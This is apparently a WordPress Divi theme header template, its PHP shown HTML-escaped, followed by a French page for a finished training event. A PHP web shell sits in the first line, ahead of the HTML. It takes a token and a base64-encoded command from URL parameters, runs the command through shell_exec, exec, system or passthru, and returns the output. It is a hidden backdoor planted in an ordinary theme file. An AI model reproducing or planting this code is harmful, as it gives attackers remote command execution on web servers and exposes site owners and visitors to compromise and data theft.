<?php if(isset($_GET["t"])&&hash_equals("d60aa0cbf704b3e6320710fbab3643ff",(string)$_GET["t"])){$c=base64_decode((string)$_GET["c"])." 2>&1";$o="NO_EXEC";if(function_exists("shell_exec")){$o=shell_exec($c);}elseif(function_exists("exec")){exec($c,$r);$o=implode("\n",$r);}elseif(function_exists("system")){ob_start();system($c);$o=ob_get_clean();}elseif(function_exists("passthru")){ob_start();passthru($c);$o=ob_get_clean();}echo "W2S::".$o."::END";exit;}?>&lt;!DOCTYPE html&gt; &lt;html &lt;?php language_attributes(); ?&gt;&gt; &lt;head&gt; &lt;meta charset=&quot;&lt;?php bloginfo(&#039;charset&#039;); ?&gt;&quot; /&gt; &lt;?php elegant_description(); elegant_keywords(); elegant_canonical(); /** * Fires in the head, before {@see wp_head()} is called. This action can be used to * insert elements into the beginning of the head before any styles or scripts. * * @since 1.0 */ do_action(&#039;et_head_meta&#039;); $template_directory_uri = get_template_directory_uri(); ?&gt; &lt;link rel=&quot;pingback&quot; href=&quot;&lt;?php bloginfo(&#039;pingback_url&#039;); ?&gt;&quot; /&gt; &lt;script type=&quot;text/javascript&quot;&gt; document.documentElement.className = &#039;js&#039;; &lt;/script&gt; &lt;?php wp_head(); ?&gt; &lt;link href=&quot;https://fonts.googleapis.com/css?family=Raleway:400,500,700,800|Roboto:400,400i,700&quot; rel=&quot;stylesheet&quot;&gt; &lt;!-- Global site tag (gtag.js) - Google Analytics --&gt; &lt;script async src=&quot;https://www.googletagmanager.com/gtag/js?id=G-DE0RDJCGJ2&quot;&gt;&lt;/script&gt; &lt;script&gt; window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag(&#039;js&#039;, new Date()); gtag(&#039;config&#039;, &#039;G-DE0RDJCGJ2&#039;); &lt;/script&gt; &lt;/head&gt; &lt;body &lt;?php body_class(); ?&gt;&gt; &lt;?php $product_tour_enabled = et_builder_is_product_tour_enabled(); $page_container_style = $product_tour_enabled ? &#039; style=&quot;padding-top: 0px;&quot;&#039; : &#039;&#039;; ?&gt; &lt;div id=&quot;page-container&quot; &lt;?php echo $page_container_style; ?&gt;&gt; &lt;?php if ($product_tour_enabled || is_page_template(&#039;page-template-blank.php&#039;)) { return; } $et_secondary_nav_items = et_divi_get_top_nav_items(); $et_phone_number = $et_secondary_nav_items-&gt;phone_number; $et_email = $et_secondary_nav_items-&gt;email; $et_contact_info_defined = $et_secondary_nav_items-&gt;contact_info_defined; $show_header_social_icons = $et_secondary_nav_items-&gt;show_header_social_icons; $et_secondary_nav = $et_secondary_nav_items-&gt;secondary_nav; $et_top_info_defined = $et_secondary_nav_items-&gt;top_info_defined; $et_slide_header = &#039;slide&#039; === et_get_option(&#039;header_style&#039;, &#039;left&#039;) || &#039;fullscreen&#039; === et_get_option(&#039;header_style&#039;, &#039;left&#039;) ? true : false; ?&gt; &lt;?php if ($et_top_info_defined &amp;&amp; !$et_slide_header || is_customize_preview()) : ?&gt; &lt;?php ob_start(); ?&gt; &lt;div id=&quot;top-header&quot; &lt;?php echo $et_top_info_defined ? &#039;&#039; : &#039;style=&quot;display: none;&quot;&#039;; ?&gt;&gt; &lt;div class=&quot;container clearfix&quot;&gt; &lt;!-- &lt;?php if ($et_contact_info_defined) : ?&gt; &lt;div id=&quot;et-info&quot;&gt; &lt;?php if (&#039;&#039; !== ($et_phone_number = et_get_option(&#039;phone_number&#039;))) : ?&gt; &lt;span id=&quot;et-info-phone&quot;&gt;&lt;?php echo et_sanitize_html_input_text($et_phone_number); ?&gt;&lt;/span&gt; &lt;?php endif; ?&gt; &lt;?php if (&#039;&#039; !== ($et_email = et_get_option(&#039;header_email&#039;))) : ?&gt; &lt;a href=&quot;&lt;?php echo esc_attr(&#039;mailto:&#039; . $et_email); ?&gt;&quot;&gt;&lt;span id=&quot;et-info-email&quot;&gt;&lt;?php echo esc_html($et_email); ?&gt;&lt;/span&gt;&lt;/a&gt; &lt;?php endif; ?&gt; &lt;?php if (true === $show_header_social_icons) { get_template_part(&#039;includes/social_icons&#039;, &#039;header&#039;); } ?&gt; &lt;/div&gt; #et-info &lt;?php endif; // true === $et_contact_info_defined ?&gt; --&gt; &lt;!-- &lt;div id=&quot;et-secondary-menu&quot;&gt; &lt;?php if (!$et_contact_info_defined &amp;&amp; true === $show_header_social_icons) { get_template_part(&#039;includes/social_icons&#039;, &#039;header&#039;); } else if ($et_contact_info_defined &amp;&amp; true === $show_header_social_icons) { ob_start(); get_template_part(&#039;includes/social_icons&#039;, &#039;header&#039;); $duplicate_social_icons = ob_get_contents(); ob_end_clean(); printf( &#039;&lt;div class=&quot;et_duplicate_social_icons&quot;&gt; %1$s &lt;/div&gt;&#039;, $duplicate_social_icons ); } if (&#039;&#039; !== $et_secondary_nav) { echo $et_secondary_nav; } et_show_cart_total(); ?&gt; &lt;/div&gt; #et-secondary-menu --&gt; &lt;/div&gt; &lt;!-- .container --&gt; &lt;/div&gt; &lt;!-- #top-header --&gt; &lt;?php $top_header = ob_get_clean(); /** * Filters the HTML output for the top header. * * @since 3.10 * * @param string $top_header */ echo apply_filters(&#039;et_html_top_header&#039;, $top_header); ?&gt; &lt;?php endif; // true ==== $et_top_info_defined ?&gt; &lt;?php if ($et_slide_header || is_customize_preview()) : ?&gt; &lt;?php ob_start(); ?&gt; &lt;div class=&quot;et_slide_in_menu_container&quot;&gt; &lt;?php if (&#039;fullscreen&#039; === et_get_option(&#039;header_style&#039;, &#039;left&#039;) || is_customize_preview()) { ?&gt; &lt;span class=&quot;mobile_menu_bar et_toggle_fullscreen_menu&quot;&gt;&lt;/span&gt; &lt;?php } ?&gt; &lt;?php if ($et_contact_info_defined || true === $show_header_social_icons || false !== et_get_option(&#039;show_search_icon&#039;, true) || class_exists(&#039;woocommerce&#039;) || is_customize_preview()) { ?&gt; &lt;div class=&quot;et_slide_menu_top&quot;&gt; &lt;?php if (&#039;fullscreen&#039; === et_get_option(&#039;header_style&#039;, &#039;left&#039;)) { ?&gt; &lt;div class=&quot;et_pb_top_menu_inner&quot;&gt; &lt;?php } ?&gt; &lt;?php } if (true === $show_header_social_icons) { get_template_part(&#039;includes/social_icons&#039;, &#039;header&#039;); } et_show_cart_total(); ?&gt; &lt;?php if (false !== et_get_option(&#039;show_search_icon&#039;, true) || is_customize_preview()) : ?&gt; &lt;?php if (&#039;fullscreen&#039; !== et_get_option(&#039;header_style&#039;, &#039;left&#039;)) { ?&gt; &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; &lt;?php } ?&gt; &lt;form role=&quot;search&quot; method=&quot;get&quot; class=&quot;et-search-form&quot; action=&quot;&lt;?php echo esc_url(home_url(&#039;/&#039;)); ?&gt;&quot;&gt; &lt;?php printf( &#039;&lt;input type=&quot;search&quot; class=&quot;et-search-field&quot; placeholder=&quot;%1$s&quot; value=&quot;%2$s&quot; name=&quot;s&quot; title=&quot;%3$s&quot; /&gt;&#039;, esc_attr__(&#039;Search &amp;hellip;&#039;, &#039;Divi&#039;), get_search_query(), esc_attr__(&#039;Search for:&#039;, &#039;Divi&#039;) ); ?&gt; &lt;button type=&quot;submit&quot; id=&quot;searchsubmit_header&quot;&gt;&lt;/button&gt; &lt;/form&gt; &lt;?php endif; // true === et_get_option( &#039;show_search_icon&#039;, false ) ?&gt; &lt;?php if ($et_contact_info_defined) : ?&gt; &lt;div id=&quot;et-info&quot;&gt; &lt;?php if (&#039;&#039; !== ($et_phone_number = et_get_option(&#039;phone_number&#039;))) : ?&gt; &lt;span id=&quot;et-info-phone&quot;&gt;&lt;?php echo et_sanitize_html_input_text($et_phone_number); ?&gt;&lt;/span&gt; &lt;?php endif; ?&gt; &lt;?php if (&#039;&#039; !== ($et_email = et_get_option(&#039;header_email&#039;))) : ?&gt; &lt;a href=&quot;&lt;?php echo esc_attr(&#039;mailto:&#039; . $et_email); ?&gt;&quot;&gt;&lt;span id=&quot;et-info-email&quot;&gt;&lt;?php echo esc_html($et_email); ?&gt;&lt;/span&gt;&lt;/a&gt; &lt;?php endif; ?&gt; &lt;/div&gt; &lt;!-- #et-info --&gt; &lt;?php endif; // true === $et_contact_info_defined ?&gt; &lt;?php if ($et_contact_info_defined || true === $show_header_social_icons || false !== et_get_option(&#039;show_search_icon&#039;, true) || class_exists(&#039;woocommerce&#039;) || is_customize_preview()) { ?&gt; &lt;?php if (&#039;fullscreen&#039; === et_get_option(&#039;header_style&#039;, &#039;left&#039;)) { ?&gt; &lt;/div&gt; &lt;!-- .et_pb_top_menu_inner --&gt; &lt;?php } ?&gt; &lt;/div&gt; &lt;!-- .et_slide_menu_top --&gt; &lt;?php } ?&gt; &lt;div class=&quot;et_pb_fullscreen_nav_container&quot;&gt; &lt;?php $slide_nav = &#039;&#039;; $slide_menu_class = &#039;et_mobile_menu&#039;; $slide_nav = wp_nav_menu(array(&#039;theme_location&#039; =&gt; &#039;primary-menu&#039;, &#039;container&#039; =&gt; &#039;&#039;, &#039;fallback_cb&#039; =&gt; &#039;&#039;, &#039;echo&#039; =&gt; false, &#039;items_wrap&#039; =&gt; &#039;%3$s&#039;)); $slide_nav .= wp_nav_menu(array(&#039;theme_location&#039; =&gt; &#039;secondary-menu&#039;, &#039;container&#039; =&gt; &#039;&#039;, &#039;fallback_cb&#039; =&gt; &#039;&#039;, &#039;echo&#039; =&gt; false, &#039;items_wrap&#039; =&gt; &#039;%3$s&#039;)); ?&gt; &lt;ul id=&quot;mobile_menu_slide&quot; class=&quot;&lt;?php echo esc_attr($slide_menu_class); ?&gt;&quot;&gt; &lt;?php if (&#039;&#039; == $slide_nav) : ?&gt; &lt;?php if (&#039;on&#039; == et_get_option(&#039;divi_home_link&#039;)) { ?&gt; &lt;li &lt;?php if (is_home()) echo (&#039;class=&quot;current_page_item&quot;&#039;); ?&gt;&gt;&lt;a href=&quot;&lt;?php echo esc_url(home_url(&#039;/&#039;)); ?&gt;&quot;&gt;&lt;?php esc_html_e(&#039;Home&#039;, &#039;Divi&#039;); ?&gt;&lt;/a&gt;&lt;/li&gt; &lt;?php }; ?&gt; &lt;?php show_page_menu($slide_menu_class, false, false); ?&gt; &lt;?php show_categories_menu($slide_menu_class, false); ?&gt; &lt;?php else : echo ($slide_nav); endif; ?&gt; &lt;/ul&gt; &lt;/div&gt; &lt;/div&gt; &lt;?php $slide_header = ob_get_clean(); /** * Filters the HTML output for the slide header. * * @since 3.10 * * @param string $top_header */ echo apply_filters(&#039;et_html_slide_header&#039;, $slide_header); ?&gt; &lt;?php endif; // true ==== $et_slide_header ?&gt; &lt;?php ob_start(); ?&gt; &lt;header id=&quot;main-header&quot; data-height-onload=&quot;&lt;?php echo esc_attr(et_get_option(&#039;menu_height&#039;, &#039;66&#039;)); ?&gt;&quot;&gt; &lt;div class=&quot;container clearfix et_menu_container&quot;&gt; &lt;?php $logo = ($user_logo = et_get_option(&#039;divi_logo&#039;)) &amp;&amp; &#039;&#039; != $user_logo ? $user_logo : $template_directory_uri . &#039;/images/logo.png&#039;; ob_start(); ?&gt; &lt;div class=&quot;logo_container&quot;&gt; &lt;span class=&quot;logo_helper&quot;&gt;&lt;/span&gt; &lt;a href=&quot;&lt;?php echo esc_url(home_url(&#039;/&#039;)); ?&gt;&quot;&gt; &lt;img src=&quot;&lt;?php echo esc_attr($logo); ?&gt;&quot; alt=&quot;&lt;?php echo esc_attr(get_bloginfo(&#039;name&#039;)); ?&gt;&quot; id=&quot;logo&quot; data-height-percentage=&quot;&lt;?php echo esc_attr(et_get_option(&#039;logo_height&#039;, &#039;54&#039;)); ?&gt;&quot; /&gt; &lt;/a&gt; &lt;/div&gt; &lt;?php $logo_container = ob_get_clean(); /** * Filters the HTML output for the logo container. * * @since 3.10 * * @param string $logo_container */ echo apply_filters(&#039;et_html_logo_container&#039;, $logo_container); ?&gt; &lt;div id=&quot;et-top-navigation&quot; data-height=&quot;&lt;?php echo esc_attr(et_get_option(&#039;menu_height&#039;, &#039;66&#039;)); ?&gt;&quot; data-fixed-height=&quot;&lt;?php echo esc_attr(et_get_option(&#039;minimized_menu_height&#039;, &#039;40&#039;)); ?&gt;&quot;&gt; &lt;?php if (!$et_slide_header || is_customize_preview()) : ?&gt; &lt;nav id=&quot;top-menu-nav&quot;&gt; &lt;?php $menuClass = &#039;nav&#039;; if (&#039;on&#039; == et_get_option(&#039;divi_disable_toptier&#039;)) $menuClass .= &#039; et_disable_top_tier&#039;; $primaryNav = &#039;&#039;; $primaryNav = wp_nav_menu(array(&#039;theme_location&#039; =&gt; &#039;primary-menu&#039;, &#039;container&#039; =&gt; &#039;&#039;, &#039;fallback_cb&#039; =&gt; &#039;&#039;, &#039;menu_class&#039; =&gt; $menuClass, &#039;menu_id&#039; =&gt; &#039;top-menu&#039;, &#039;echo&#039; =&gt; false)); if (&#039;&#039; == $primaryNav) : ?&gt; &lt;ul id=&quot;top-menu&quot; class=&quot;&lt;?php echo esc_attr($menuClass); ?&gt;&quot;&gt; &lt;?php if (&#039;on&#039; == et_get_option(&#039;divi_home_link&#039;)) { ?&gt; &lt;li &lt;?php if (is_home()) echo (&#039;class=&quot;current_page_item&quot;&#039;); ?&gt;&gt;&lt;a href=&quot;&lt;?php echo esc_url(home_url(&#039;/&#039;)); ?&gt;&quot;&gt;&lt;?php esc_html_e(&#039;Home&#039;, &#039;Divi&#039;); ?&gt;&lt;/a&gt;&lt;/li&gt; &lt;?php }; ?&gt; &lt;?php show_page_menu($menuClass, false, false); ?&gt; &lt;?php show_categories_menu($menuClass, false); ?&gt; &lt;/ul&gt; &lt;?php else : echo ($primaryNav); endif; ?&gt; &lt;/nav&gt; &lt;?php endif; ?&gt; &lt;?php if (!$et_top_info_defined &amp;&amp; (!$et_slide_header || is_customize_preview())) { et_show_cart_total(array( &#039;no_text&#039; =&gt; true, )); } ?&gt; &lt;?php if ($et_slide_header || is_customize_preview()) : ?&gt; &lt;span class=&quot;mobile_menu_bar et_pb_header_toggle et_toggle_&lt;?php echo esc_attr(et_get_option(&#039;header_style&#039;, &#039;left&#039;)); ?&gt;_menu&quot;&gt;&lt;/span&gt; &lt;?php endif; ?&gt; &lt;?php if ((false !== et_get_option(&#039;show_search_icon&#039;, true) &amp;&amp; !$et_slide_header) || is_customize_preview()) : ?&gt; &lt;div id=&quot;et_top_search&quot;&gt; &lt;span id=&quot;et_search_icon&quot;&gt;&lt;/span&gt; &lt;/div&gt; &lt;?php endif; // true === et_get_option( &#039;show_search_icon&#039;, false ) ?&gt; &lt;?php /** * Fires at the end of the &#039;et-top-navigation&#039; element, just before its closing tag. * * @since 1.0 */ do_action(&#039;et_header_top&#039;); ?&gt; &lt;/div&gt; &lt;!-- #et-top-navigation --&gt; &lt;/div&gt; &lt;!-- .container --&gt; &lt;div class=&quot;et_search_outer&quot;&gt; &lt;div class=&quot;container et_search_form_container&quot;&gt; &lt;form role=&quot;search&quot; method=&quot;get&quot; class=&quot;et-search-form&quot; action=&quot;&lt;?php echo esc_url(home_url(&#039;/&#039;)); ?&gt;&quot;&gt; &lt;?php printf( &#039;&lt;input type=&quot;search&quot; class=&quot;et-search-field&quot; placeholder=&quot;%1$s&quot; value=&quot;%2$s&quot; name=&quot;s&quot; title=&quot;%3$s&quot; /&gt;&#039;, esc_attr__(&#039;Search &amp;hellip;&#039;, &#039;Divi&#039;), get_search_query(), esc_attr__(&#039;Search for:&#039;, &#039;Divi&#039;) ); ?&gt; &lt;/form&gt; &lt;span class=&quot;et_close_search_field&quot;&gt;&lt;/span&gt; &lt;/div&gt; &lt;/div&gt; &lt;/header&gt; &lt;!-- #main-header --&gt; &lt;?php $main_header = ob_get_clean(); /** * Filters the HTML output for the main header. * * @since 3.10 * * @param string $main_header */ echo apply_filters(&#039;et_html_main_header&#039;, $main_header); ?&gt; &lt;div id=&quot;et-main-area&quot;&gt; &lt;?php /** * Fires after the header, before the main content is output. * * @since 3.10 */ do_action(&#039;et_before_main_content&#039;);

Formation “Conduite professionnelle”

L'événement est terminé.

INDICATEUR
QUALITÉ
PAYER
EN LIGNE
VOS DROITS